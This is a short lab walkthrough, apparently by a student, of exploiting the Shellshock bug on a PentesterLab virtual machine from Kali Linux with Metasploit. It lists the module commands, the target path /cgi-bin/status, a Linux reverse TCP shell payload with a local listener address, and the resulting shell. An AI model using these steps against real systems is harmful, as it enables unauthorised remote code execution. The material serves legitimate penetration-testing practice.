First, we must create a NATNetwork by going to file’s preferences.
Next, set both your kali and the vulnerable vm to use NATNetwork instead of NAT.
Next, check if the vulnerable vm is online by entering it’s ip in your kali’s browser
Next, turn on your kali linux and use the browser to check if the vulnerable server is active
Next, open up your metasploit by typing msfconsole.
After opening metasploit,type search shellshock to find the shellshock exploit.
After finding the specific exploit, use it by typing “ use ‘exploit filepath’”
Then, type show options to display required info that still needs to be inputted.
As you can see, targeturi and rhost is still empty so we must input it by typing “set rhost ‘ipofvulnerable’” and then “set targeturi ‘/cgi-bin/status’”. The targeturi is ‘/cgi-bin/status/’ because that is where the shell is located.
Next, we have to set the payload by first seeing the available payload by typing “show payload”, then we choose the /linux/x86/shell/reverse_tcp as our payload and set it by typing “set payload /linux/x86/shell/reverse_tcp”. We chose reverse tcp because it allows the vulnerable vm to connect to the kali machine instead of the kali machine requesting to connect to the vulnerable.
Next we type check to see if the target is vulnerable
Because it says it failed to validate the lhost, so we have to reset the lhost by typing “set lhost 10.0.2.15”
Now, we just need to exploit.As you can see, when you type “whoami” it says pentesterlab.
